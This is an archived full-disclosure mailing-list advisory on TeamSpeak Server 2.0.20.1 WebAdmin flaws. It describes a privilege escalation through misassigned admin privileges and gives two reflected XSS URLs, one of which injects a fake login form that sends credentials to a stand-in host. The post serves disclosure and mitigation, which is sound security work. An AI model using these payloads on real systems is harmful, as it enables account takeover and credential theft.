full-disclosure-uk May 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: [Full-disclosure] Teamspeak Server 2.0.20.1

[Full-disclosure] Teamspeak Server 2.0.20.1 Vulnerabilities

From: Gilberto Ficara <g.ficara_at_nospam>
Date: Fri May 11 2007 - 13:52:43 GMT
To: full-disclosure@lists.grok.org.uk


Hi everyone,
several months ago I discovered some vulnerabilities in TeamSpeak Server WebAdmin interface.

I sent the advisory and exploit to the developers about two months ago (11 03 2007), but the server is still vulnerable, today.

Affected software: Teamspeak Server 2.0.20.1

Looks like the beta build 2.0.23.15 isn't affected (or at least my exploit doesn't work on that).

  1. Privilege escalation can lead to Service Abuse or Denial of Service

TeamSpeak server is based on a "site" and multiple "virtual servers".

On each "site" there are one or more SuperAdmin users that can manage the site configuration, adding more SuperAdmin users, adding, starting, stopping or removing virtual servers or even manage each single server, by selecting it from the web interface or the text-based one.

Each virtual server has one or more ServerAdmin users that can modify virtual server parameters (like the name), adding new users for the specified server (also new ServerAdmin users) and modify user privileges relative to that virtual server.

The problem lies on the RegisteredUser privileges configuration page: in that page are listed privileges intended to be associated to the SuperAdmin role, like AdminAddServer or AdminStartServer. By activating these privileges for the RegisteredUsers role, loggin in with a new RegisteredUser account and doing some simple url tampering it is possible to CREATE, START, STOP and DELETE virtual servers to the site, without SuperAdmin access.

What is required:

  • ServerAdmin access to the web interface

Here is a simple exploit pattern:

Pages ok_box.html and error_box.html are vulnerable to common Cross Site Scripting attacks:

http://your_ts_server_here:14534/error_box.html?error_title=session expired - please
login&error_text=<form action="http://127.0.0.1:31338/own.cgi">User: <input
type="text"><br>Pass: <input type="password"><br><br><input type="submit"></form>&error_url=index.html

http://webadmin_uri:14534/ok_box.html?ok_title=%3Cscript% 3Ealert('hello')%3C/script%3E

Mitigation


Disable WebAdmin access.
Upgrade to beta release.

Gilberto Ficara

(sorry for my bad english :))



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/